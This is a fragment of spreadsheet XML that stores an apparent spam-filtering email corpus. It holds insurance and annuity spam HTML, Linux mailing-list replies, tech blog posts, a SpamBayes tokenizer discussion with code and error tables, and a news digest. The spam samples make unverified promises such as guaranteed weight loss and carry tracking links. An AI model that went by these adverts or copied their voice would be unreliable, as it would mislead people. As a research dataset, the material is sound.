 bgcolor=3D"#CCFFFF"&gt;E-mail:&lt;/td&gt;
                     &lt;td colspan=3D"4" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"text" name=3D"email" size=3D"50"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"15%" align=3D"right" =
 bgcolor=3D"#CCFFFF"&gt;Phone:&lt;/td&gt;
                     &lt;td colspan=3D"4" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"text" name=3D"phone" size=3D"50"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"15%" align=3D"right" =
 bgcolor=3D"#CCFFFF"&gt;City:&lt;/td&gt;
                     &lt;td width=3D"30%" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"text" name=3D"city" size=3D"20"&gt;
                     &lt;/td&gt;
                     &lt;td width=3D"15%" align=3D"right" =
 bgcolor=3D"#CCFFFF"&gt;State:&lt;/td&gt;
                     &lt;td width=3D"20%" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"text" name=3D"state" size=3D"2"&gt;
                     &lt;/td&gt;
                     &lt;td rowspan=3D"2" align=3D"center" valign=3D"middle" =
 bgcolor=3D"#CCFFFF"&gt;&lt;img src=3D"http://63.211.81.87/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"15%" align=3D"right" =
 bgcolor=3D"#CCFFFF"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td width=3D"30%" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                     &lt;/td&gt;
                     &lt;td width=3D"15%" align=3D"right" =
 bgcolor=3D"#CCFFFF"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td width=3D"20%" bgcolor=3D"#CCFFFF"&gt;=20
                       &lt;input type=3D"hidden" name=3D"hdnRecipientTxt" =
 value=3D"jaresponse@us.fortis.com"&gt;
                       &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Short Term Medical inquery"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
               &lt;/td&gt;
             &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" cellpadding=3D"7" =
 align=3D'center'&gt;
     &lt;tr&gt;=20
       &lt;td bgcolor=3D"#003366" width=3D"146" align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/alden/fortisend.gif" width=3D"144" =
 height=3D"58"&gt;&lt;/td&gt;
       &lt;td bgcolor=3D"#003366" width=3D"376"&gt;&lt;font face=3D"Arial" =
 color=3D"#FFFFFF" size=3D'1'&gt;&lt;p&gt;Insurance=20
         products are underwritten and issued by John Alden Life =
 Insurance Company,=20
         and administered by Fortis Insurance Company, both Fortis Health =
 member=20
         companies, Milwaukee, WI. Short Term Medical is presented by =
 North Star=20
         Marketing, &lt;a =
 href=3D"http://www.nstarmarketing.com"&gt;www.nstarmarketing.com&lt;/a&gt;&lt;/p&gt;&lt;/fo=
 nt&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" cellpadding=3D"7" =
 align=3D'center'&gt;
     &lt;tr&gt;
       &lt;td bgcolor=3D"#003366"&gt;=20
         &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"1" color=3D"#FFFFFF"&gt;We=20
           don't want anybody to receive our mailing who does not wish to =
 receive=20
           them. This is a professional communication sent to insurance =
 professionals.=20
           To be removed from this mailing list, DO NOT REPLY to this =
 message.=20
           Instead, go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
           &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
         &lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_152120_01C1FF20.AD02E910--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Postmortem: Ubi Soft China's Music Up -- Summer Rainbow
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613667,159/
 Date: 2002-10-06T18:12:53+01:00
 Ubi China had always wanted to make a PC game for the local market, but a 
 number to factors kept the idea on hold. In January 2001, the right incentive 
 to motivate Ubi China to try a local project finally arrived: the license for 
 "Music Up", a popular animated property.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Fwd: Linux Beer Hike
</t>
  </si>
  <si>
    <t xml:space="preserve">Satelle, StevenX wrote:
 &gt; When I was in school they pushed Irish down my throat. I developed a hatred
 &gt; for Irish. I did French for 3 years and German for 6 months, I could
 &gt; (almost) hold a basic conversation. I am proud of the fact that I don't know
 &gt; one word of Irish. 
 Well, I'm hardly a Gaeilgir, but in general I wouldn't consider
 either ability or inability in a language something to be proud
 of... maybe it's just me, but I'm not proud that I can't speak
 Italian, no more than I'm proud that I can speak French or
 English.
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Holidays for freshrpms.net :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-09-10 at 12:39, Matthias Saou wrote:
 &gt; Hi all,
 &gt; 
 &gt; I'll be leaving this evening until next Monday, with no access to
 &gt; whatsoever to a single computer until then, woohoo, real holidays! :-)
 I don't think I could take it. The network was down for an hour here and
 I was climbing the walls. :)
 Enjoy!
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG-Social] Completely silent pc
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 12:06:35PM +0100, Greg Farrel wrote:
 &gt; 
 &gt; &gt; An old laptop would probably be ideal.  That way, it comes with its own 
 &gt; &gt; UPS (the battery).
 &gt; D'oh. I ment to say that I cant use a laptop, as I have a pci wireless
 &gt; card and the cable for it (about 180 dollars). So it has to be a pc, with
 &gt; a pci 2.2 connector (ie some pentiums, and anything above)
 &gt; 
 &gt;  &gt; 
 &gt; &gt; Some people strip down old 486 boxes, take out the hard drive, disable
 &gt; &gt; the fans, and run the thing from just a floppy drive or a CDR you've
 &gt; &gt; burned for the purpose.  
 &gt; I'd do that with my 166, but the psu has a fan. And a 486 wont support my
 &gt; wireless card :( I know. I'm awkward,
 Try www.quietpc.com.  Don't know if they have fanless PSUs but they claim
 to have really, really quiet ones.
 Later,
 Kenn
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: My Good Easy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/07.html#my_good_easy
 Date: 2002-10-07T17:59:05-05:00
 _Joe Gregorio_: My next pet project[1]. &amp;#8220;Trying to re-create the "Good 
 Easy[2]" on a Windows machine.&amp;#8221; I have also made half-hearted attempts in 
 this direction, as I am forced to use Windows during the day. I say 
 half-hearted because I'm still application-centric, and I don't go as far with 
 keyboard shortcuts as I could. But I don't use the desktop at all (never have, 
 on any system), and I don't use ctrl alt keyboard shortcuts because I 
 personally find them awkward (YMMV). If you must use Windows, the first step 
 towards a productive system is managing your Start menu. 
 I use the main level of the Start menu with numbered shortcuts to my most 
 common programs. "0 Control Panel[3]", "1 Mozilla[4]", "2 Emacs[5]", "3 DOS 
 home", "4 DOS work", "5 DOS incoming" (each of which gives me a command line, 
 but in different directories), "7 Python[6]", "9 IE". Also "# Explorer home", 
 "$ Explorer work", "% Explorer incoming", which open Explorer windows in 
 various useful directories (the same directories as the DOS shortcuts, only 
 with the shift key held down, and yes, I intentionally set it up so that $ went 
 to my work folder). Less-used programs are taken out of their useless submenus 
 (as installed) and moved directly into the Programs submenu and given unique 
 first letters as needed. "Ad-aware[7]", "Excel[8]", "IM", "Netscape 4[9]", 
 "Paint Shop Pro", "Query Tool (ODBC)[10]", "VMWare[11]", "Word[12]". All other 
 submenus except Startup are removed from the Programs menu. (Yes, delete 
 "Accessories". Do you honestly ever use it? If so, it's probably a sign of a 
 larger productivity problem.) Things which never need to be run manually (like 
 WinZip and Quicktime) are removed from the Programs menu. Maintaining a clean 
 Programs menu is an ongoing struggle, but well worth it. 
 On most modern keyboards, there is a key next to your left alt key that opens 
 the start menu, which you can press with your left thumb without taking your 
 fingers off the home keys. Otherwise ctrl esc always works. Menu 4 gives me a 
 new command prompt in my work directory. Menu P N runs Netscape 4 (for 
 compatibility testing in my day job, ugh). Mozilla and Emacs are almost always 
 open, but I quit lesser-used applications as soon as I'm done using them 
 (mostly because my laptop doesn't have a lot of memory). 
 I install Cygwin[13] so that the command line is actually useful. Cygwin is a 
 collection of Windows ports of all your favorite UNIX utilities, including mv, 
 cp, scp, ssh, man, tar, less, grep, patch, ncftp, cvs, and many others. And 
 bash, which I don't use because I dislike how it handles Windows pathnames. I 
 also set the properties of my command line shortcuts to set the window size to 
 120 x 50 (almost full screen at 1024 x 768), and screen buffer size to 120 x 
 3000. Set window position at 0 x 0, and don't let the system position the 
 window. 
 In Mozilla, I set my home page to "about:blank", set Internet Search to search 
 with Google, use Tabbed Browsing, open tabs instead of windows in all possible 
 cases, always show the tab bar, and load links in the background (essential for 
 weblog surfing, you can ctrl click links to open them in new tabs in the 
 background). Under Scripts &amp; Plugins, I do not allow scripts to open 
 unrequested windows. I turn off the sidebar, turn on the Site Navigation Bar, 
 delete all pre-installed bookmarks, and create two bookmarks: one which takes 
 me to my webmail, and another which takes me to my internal site search[14], 
 from which I can find all other bookmarks I need. 
 In Internet Explorer, I set my home page to the page to edit my weblog, since 
 that's the only thing I do in Internet Explorer. alt tab back and forth between 
 Mozilla and IE is easier than ctrl pgup/pgdown between tabs within Mozilla, 
 since TEXTAREAs in Mozilla lose focus when you switch tabs, making copying and 
 pasting weblog entries virtually impossible. 
 I use Emacs locally and vi remotely, because the default behavior of Emacs is 
 so heinous as to render it unusable. (For instance, editing a CGI script named 
 foo.cgi on a web server with Emacs would generate a foo.cgi~ backup file, which 
 is world-readable and is sent as plain text to any browser that asks. Try this 
 sometime on your favorite web site.) Among other things, my .emacs file (which 
 is actually called _emacs on Windows) instructs Emacs to store all backup files 
 in a single directory (d:\backup); to treat all XML files as DocBook, all CGI 
 scripts as Python, and all SQL scripts as PL/SQL; to use Cygwin's bash shell 
 for M-x-shell; to use a single maximized frame with no menubar, titled as the 
 name of the current file; to show column numbers; to accept "y" and "n" for 
 yes/no questions; not to blink; not to beep; and to close the current file when 
 I press M-w. I use some weird registry hacks and a hacked notepad.exe to get 
 all text files to open in Emacs. (I got this idea from Ultraedit[15].) My 
 _emacs file is my second most backed-up possession. 
 I don't use Windows' useless directory structure for user home directories. On 
 my D drive I have d:\home (contains directories for my books and other personal 
 projects, each under CVS control&amp;#8212;also set as my home directory using the 
 HOME environment variable), d:\work (contains directories for each work 
 project, also under CVS), d:\incoming (set as default download directory for 
 all programs that download things), and d:\backup (used by Emacs, and for 
 temporary storage, for instance for storing originals when checking out newly 
 created CVS projects). I don't know or care what's where on my C drive. 
 I have tried many, many address books, and still store all my contacts, email 
 addresses, snail mail addresses, phone numbers, and other vital personal 
 information in a text file called phone, stored in d:\home\phone. It is not in 
 any particular format, other than being plain text and usually including blank 
 lines between entries. I categorize people with simple keywords in parentheses 
 after their name, and use M-x-occur in Emacs to search by keyword. This file is 
 my single most backed-up possession. 
 Other essential free Windows utilities I use (in no particular order): TweakUI
 [16], Cygwin[17], Guidescope[18], ZoneAlarm[19].
 [1]  http://bitworking.org/Oct2002.html#X631695997519494480
 [2]  http://www.winterspeak.com/columns/082001.html
 [3]  http://www.annoyances.org/exec/show/article02-013
 [4]  http://www.mozilla.org/
 [5]  http://www.gnu.org/software/emacs/windows/ntemacs.html
 [6]  http://www.activestate.com/Products/ActivePython/
 [7]  http://www.lavasoftusa.com/
 [8]  http://www.openoffice.org/
 [9]  http://sillydog.org/narchive/
 [10] http://gpoulose.home.att.net/
 [11] http://www.vmware.com/
 [12] http://www.openoffice.org/
 [13] http://www.cygwin.com/
 [14] http://diveintomark.org/mt/mt-search.cgi
 [15] http://www.ultraedit.com/downloads/index.html#notepad
      Replacing Notepad with Ultraedit-32
 [16] http://www.microsoft.com/ntworkstation/downloads/PowerToys/Networking/NTTweakUI.asp
 [17] http://www.cygwin.com/
 [18] http://www.guidescope.com/
 [19] http://download.com.com/3000-2092-10039884.html?part=zonealarm&amp;subj=dlpage
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Line in the Sand
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85443841
 Date: Not supplied
 Bug 22056 has to do with enabling different toolbar modes. It's a pretty basic 
 browser feature that has been missing from Navigator for years. Even simplified 
 browsers like Chimera have this feature. Neil did some excellent work in 22056 
 and his code finally landed. It naturally spiked startup time and window time 
 slightly, and so it ended up being backed out because of Mozilla's no tolerance 
 policy for regressions.
 While this "line in the sand" policy is in many ways a good one, I feel like it 
 misses the point. There is a natural tendency when designing applications to 
 add features in every new version of the software. Only rarely do you see 
 features removed. With each passing version, you get more and more bloated, 
 relying on faster machines and more memory to save the day. Who cares if the 
 user interface is now full of 3000 menu items? You still support every last 
 feature since version 1.0, so no customers can possibly be dissatisfied!
 You can really only cram so many features into a product before its size 
 requirements and performance requirements have to change. This is an obvious 
 rule. It's like you start with an empty elevator that says "Capacity: 10 
 people." The elevator stops at the first floor (version 1.0) and a bunch of 
 people (features) get on. Continuing on its journey, the elevator stops at the 
 second floor, and still more people get on. The elevator is now full, and it 
 continues to the third floor (version 3.0). Unfortunately the elevator is full, 
 but there are a bunch of people waiting at the third floor to get on. Some of 
 them squeeze in anyway, past the fat person from the first floor (the Mozilla 
 sidebar feature) who is taking up enough space for 3 people. Everyone wishes 
 he'd get off at the third floor or even the fourth floor, but he doesn't. 
 Someone (the Mozilla wallet feature) from the second floor cuts one on the way 
 to the third floor, so he's useless, and everyone wishes he'd get off too. He 
 doesn't though. Nobody does. People keep piling in at floor after floor, until 
 eventually the elevator support cable snaps and everybody dies.
 We need to forcibly eject people from the elevator. Remove the features that 
 nobody wants and replace them with the features that matter. Cull out the 
 features that didn't work in Mozilla 1.0 and make sure they aren't there in 
 Mozilla 2.0. Make more of the features optional plugins so that geeks who want 
 some of the more obscure features (and that have powerhouse machines) can go 
 download them on their own. Only if we actively fight the trend towards bloat 
 will we finally produce an awesome Mozilla browser.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Java is for kiddies
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
 &gt; Microsoft has announced that they plan to remove Java from Windows.
 &gt; They took it out of XP already and it has to be installed with a
 &gt; service pack.  Somehow, I can't imagine them removing the ability to
 &gt; run C programs.
 They removed /their/ Java VM. They didn't remove the ability to run Java
 programs.
 Anybody is free to develop their own Java VM and make it kick ass. As
 someone said earlier in the thread, nobody is capable or willing to do that.
 I've done a bunch of Java and haven't run into huge problems running the
 same bytecode across Solaris or Win2K.
 What actual problems have people actually run into. Actually.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Speaking in Texas this Friday
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490332
 Date: Not supplied
 Just a reminder: I'm speaking at the University of Texas at Austin at 7PM this 
 Friday -- giving a talk on Hollywood's legislative agenda, sponsored by 
 EFF-Austin, ACTLab, and ACLU-Texas. Love to see you there! Link[1] Discuss[2]
 [1] http://effaustin.org/cory.html
 [2] http://www.quicktopic.com/boing/H/DQswgUPGs5Y
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Best
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/30.html#best
 Date: 2002-09-30T16:06:50-05:00
 _Heather Hamilton_: Very Best of the World's Worst[1]. &amp;#8220;After watching 
 last night's premiere of "The Very Best of the World's Worst Drivers: 2" I 
 tried to figure out what it was about these very best worst drivers that made 
 them the very best, but not really _the_ very best, because if they really were 
 _the_ very best, wouldn't they have been featured on "The Very Best of the 
 World's Worst Drivers: 1" ?&amp;#8221;
 [1] http://www.dooce.com/mtarchives/09_30_2002.html
</t>
  </si>
  <si>
    <t xml:space="preserve">[Guido]
 &gt; I *meant* to say that they were 0.99 clues cancelled out by 0.01
 &gt; clues.  But that's wrong too!  It looks I haven't grokked this part of
 &gt; your code yet; this one has way more than 16 clues, and it seems the
 &gt; classifier basically ended up counting way more 0.99 than 0.01 clues,
 &gt; and no others made it into the list.  I thought it was looking for
 &gt; clues with values in between; apparently it found none that weren't
 &gt; exactly 0.5?
 There's a brief discussion of this before the definition of
 MAX_DISCRIMINATORS.  All clues with prob MIN_SPAMPROB and MAX_SPAMPROB are
 saved in min and max lists, and all other clues are fed into the nbest heap.
 Then the shorter of the min and max lists cancels out the same number of
 clues in the longer list.  Whatever remains of the longer list (if anything)
 is then fed into the nbest heap too, but no more than MAX_DISCRIMINATORS of
 them.  In no case do more than MAX_DISCRIMINATORS clues enter into the final
 probability calculation, but all of the min and max lists go into the list
 of clues (else you'd have no clue that massive cancellation was occurring;
 and massive cancellation may yet turn out to be a hook to signal that manual
 review is needed).  In your specific case, the excess of clues in the longer
 MAX_SPAMPROB list pushed everything else out of the nbest heap, and that's
 why you didn't see anything other than 0.01 and 0.99.
 Before adding these special lists, the outcome when faced with many 0.01 and
 0.99 clues was too often a coin toss:  whichever flavor just happened to
 appear MAX_DISCRIMINATORS//2 + 1 times first determined the final outcome.
 &gt;&gt; That sure sets the record for longest list of cancelling extreme clues!
 &gt; This happened to be the longest one, but there were quite a few
 &gt; similar ones.
 I just beat it &lt;wink&gt;:  a tokenization scheme that folds case, and ignores
 punctuation, and strips a trailing 's' from words, and saves both word
 bigrams and word unigrams, turned up a low-probability very long spam with a
 list of 410 0.01 clues and 125 0.99 clues!  Yikes.
 &gt; I wonder if there's anything we can learn from looking at the clues and
 the
 &gt; HTML.  It was heavily marked-up HTML, with ads in the sidebar, but the
 body
 &gt; text was a serious discussion of "OO and soft coding" with lots of highly
 &gt; technical words as clues (including Zope and ZEO).
 No matter how often it says Zope, it gets only one 0.01 clue from doing so.
 Ditto for ZEO.  In contrast, HTML markup has many unique "words" that get
 0.99.  BTW, this is a clear case where the assumption of
 conditionally-independent word probabilities is utterly bogus -- e.g., the
 probability that "&lt;body&gt;" appears in a message is highly correlated with the
 prob of "&lt;br&gt;" appearing.  By treating them as independent, naive Bayes
 grossly misjudges the probability that both appear, and the only thing you
 get in return is something that can actually be computed &lt;wink&gt;.
 Read the "What about HTML?" section in tokenizer.py.  From the very start,
 I've been investigating what would work best for the mailing lists hosted at
 python.org, and HTML decorations have so far been too strong a clue to
 justify ignoring it in that specific context.  I haven't done anything
 geared toward personal email, including the case of non-mailing-list email
 that happens to go through python.org.
 I'd prefer to strip HTML tags from everything, but last time I tried that it
 still had bad effects on the error rates in my corpora (the full test
 results with and without HTML tag stripping is included in the "What about
 HTML?" comment block).  But as the comment block also says,
 # XXX So, if another way is found to slash the f-n rate, the decision here
 # XXX not to strip HTML from HTML-only msgs should be revisited.
 and we've since done several things that gave significant f-n rate
 reductions.  I should test that again now.
 &gt; Are there any minable-but-unmined header lines in your corpus left?
 Almost all of them -- apart from MIME decorations that appear in both
 headers and bodies (like Content-Type), the *only* header lines the base
 tokenizer looks at now are Subject, From, X-Mailer, and Organization.
 &gt; Or do we have to start with a different corpus before we can make
 &gt; progress there?
 I would need different data, yes.  My ham is too polluted with Mailman
 header decorations (which I may or may not be able to clean out, but fudging
 the data is a Mortal Sin and I haven't changed a byte so far), and my spam
 too polluted with header clues about the fellow who collected it.  In
 particular I have to skip To and Received headers now, and I suspect they're
 going to be very valuable in real life (for example, I don't even catch
 "undisclosed recipients" in the To header now!).
 &gt; ...
 &gt; No, sorry.  These were all of the following structure:
 &gt;
 &gt;   multipart/mixed
 &gt;       text/plain        (brief text plus URL(s))
 &gt;       text/html         (long HTML copied from website)
 Ah!  That explains why the HTML tags didn't get stripped.  I'd again offer
 to add an optional argument to tokenize() so that they'd get stripped here
 too, but if it gets glossed over a third time that would feel too much like
 a loss &lt;wink&gt;.
 &gt;&gt; This seems confused: Jeremy didn't use my trained classifier pickle,
 &gt;&gt; he trained his own classifier from scratch on his own corpora.
 &gt;&gt; ...
 &gt; I think it's still corpus size.
 I reported on tests I ran with random samples of 220 spams and 220 hams from
 my corpus (that means training on sets of those sizes as well as predicting
 on sets of those sizes), and while that did harm the error rates, the error
 rates I saw were still much better than Jeremy reported when using 500 of
 each.
 Ah, a full test run just finished, on the
    tokenization scheme that folds case, and ignores punctuation, and strips
 a
    trailing 's' from words, and saves both word bigrams and word unigrams
 This is the code:
             # Tokenize everything in the body.
             lastw = ''
             for w in word_re.findall(text):
                 n = len(w)
                 # Make sure this range matches in tokenize_word().
                 if 3 &lt;= n &lt;= 12:
                     if w[-1] == 's':
                         w = w[:-1]
                     yield w
                     if lastw:
                         yield lastw + w
                     lastw = w + ' '
                 elif n &gt;= 3:
                     lastw = ''
                     for t in tokenize_word(w):
                         yield t
 where
     word_re = re.compile(r"[\w$\-\x80-\xff]+")
 This at least doubled the process size over what's done now.  It helped the
 f-n rate significantly, but probably hurt the f-p rate (the f-p rate is too
 low with only 4000 hams per run to be confident about changes of such small
 *absolute* magnitude -- 0.025% is a single message in the f-p table):
 false positive percentages
     0.000  0.000  tied
     0.000  0.075  lost  +(was 0)
     0.050  0.125  lost  +150.00%
     0.025  0.000  won   -100.00%
     0.075  0.025  won    -66.67%
     0.000  0.050  lost  +(was 0)
     0.100  0.175  lost   +75.00%
     0.050  0.050  tied
     0.025  0.050  lost  +100.00%
     0.025  0.000  won   -100.00%
     0.050  0.125  lost  +150.00%
     0.050  0.025  won    -50.00%
     0.050  0.050  tied
     0.000  0.025  lost  +(was 0)
     0.000  0.025  lost  +(was 0)
     0.075  0.050  won    -33.33%
     0.025  0.050  lost  +100.00%
     0.000  0.000  tied
     0.025  0.100  lost  +300.00%
     0.050  0.150  lost  +200.00%
 won   5 times
 tied  4 times
 lost 11 times
 total unique fp went from 13 to 21
 false negative percentages
     0.327  0.218  won    -33.33%
     0.400  0.218  won    -45.50%
     0.327  0.218  won    -33.33%
     0.691  0.691  tied
     0.545  0.327  won    -40.00%
     0.291  0.218  won    -25.09%
     0.218  0.291  lost   +33.49%
     0.654  0.473  won    -27.68%
     0.364  0.327  won    -10.16%
     0.291  0.182  won    -37.46%
     0.327  0.254  won    -22.32%
     0.691  0.509  won    -26.34%
     0.582  0.473  won    -18.73%
     0.291  0.255  won    -12.37%
     0.364  0.218  won    -40.11%
     0.436  0.327  won    -25.00%
     0.436  0.473  lost    +8.49%
     0.218  0.218  tied
     0.291  0.255  won    -12.37%
     0.254  0.364  lost   +43.31%
 won  15 times
 tied  2 times
 lost  3 times
 total unique fn went from 106 to 94
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Join the Web's Fastest Growing Singles Community                       14.51
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Monday July 22
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.
 Software
     Bill Gates spams the world on Trustworthy Computing
     Integrity? He's heard of it too...
         http://www.theregister.co.uk/content/4/26292.html
     ElcomSoft rubbishes eBook security ahead of Sklyarov case
     Shot across the bows
         http://www.theregister.co.uk/content/4/26291.html
     Capitalist tool Forbes tools up for Linux
     Insurgents win glossy special report accolade
         http://www.theregister.co.uk/content/4/26289.html
     China to build own version of Windows 98
     Compatible with Office 2000 and Word, says here
         http://www.theregister.co.uk/content/4/26278.html
 Personal Hardware
     Dan sold - but not as going concern
     New owner buys assets
         http://www.theregister.co.uk/content/54/26287.html
 Semiconductors
     Inventor of Risc chips dies
     John Cocke RIP
         http://www.theregister.co.uk/content/3/26293.html
 Internet
     JPEG guardians vow to defend free images
     All your compression tech belongs to  er,  somebody in Texas
         http://www.theregister.co.uk/content/6/26296.html
     KPNQwest employees abandon posts
     Network on cruise control
         http://www.theregister.co.uk/content/6/26295.html
     BT broadband barometer shows faulty readings
     Open wide
         http://www.theregister.co.uk/content/6/26286.html
     Dutch judge tears up bulk mail ban
     Be a good boy and eat your spam
         http://www.theregister.co.uk/content/6/26283.html
     WorldCom to face bankruptcy on Monday?
     So it seems
         http://www.theregister.co.uk/content/6/26280.html
     Easynet buys ex-Energis German ops
     Subject to approvals...
         http://www.theregister.co.uk/content/6/26279.html
     Time Warner takes over AOL
     Grownups back in charge
         http://www.theregister.co.uk/content/6/26276.html
 Net Security
     Face recognition fails in Boston airport
     The patriotic scam goes on
         http://www.theregister.co.uk/content/55/26298.html
     New thomas.greene spam circulating
     Filter me!
         http://www.theregister.co.uk/content/55/26294.html
     ElcomSoft rubbishes eBook security ahead of Sklyarov case
     Shot across the bows
         http://www.theregister.co.uk/content/55/26291.html
     The Devil is in the Detail
     The SCREWTAPE Letters
         http://www.theregister.co.uk/content/55/26284.html
 Business
     Ericsson axes 5,000 jobs
     Posts worse than expected losses
         http://www.theregister.co.uk/content/7/26282.html
     Sun goes back into black
     Back in the black as US sales increase 20%
         http://www.theregister.co.uk/content/7/26281.html
     MS licensing deadline boosts popularity of WinXP
     Funny that...
         http://www.theregister.co.uk/content/7/26277.html
     Time Warner takes over AOL
     Grownups back in charge
         http://www.theregister.co.uk/content/7/26276.html
 Broadband
     Satellite broadband for cars goes live in UK
     Unfortunately, there's just the teensiest problem...
         http://www.theregister.co.uk/content/22/26288.html
     BT broadband barometer shows faulty readings
     Open wide
         http://www.theregister.co.uk/content/22/26286.html
 The Mac Channel
     Apple must raise prices - Now!
     Letters Jobs, you're too cheap
         http://www.theregister.co.uk/content/39/26297.html
 Channel Flannel
     Dan sold - but not as going concern
     New owner buys assets
         http://www.theregister.co.uk/content/51/26287.html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</si>
  <si>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Subject: 3 Year Annuity...5% Guaranteed Rate
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_49E3B3_01C20A41.97599E20
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  HOLY COW!!!
  =09
  	 3 YEAR ANNUITY=0A=
 Guaranteed 5% Rate=0A=
 3.25% Commission=0A=
 3 Year
 Surrender
  Limited Time Only!=09
 =20
 Call or e-mail &lt;mailto:ANNUITIES@INSUR-SAFE.COM&gt;  us today!
  800-553-2391
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
  =20
 =20
   =09
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt; =20
 ------=_NextPart_000_49E3B3_01C20A41.97599E20
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;3 YEar Annuity...5% Guaranteed Rate&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" border=3D"0" =
 bgcolor=3D"#ffffff" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/images/milner/20020508-101b.gif" =
 width=3D"550" height=3D"115" alt=3D"HOLY COW!!!"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/milner/20020508-102b.jpg" =
 width=3D"550" height=3D"109"&gt;&lt;/td&gt;
   &lt;/tr&gt;
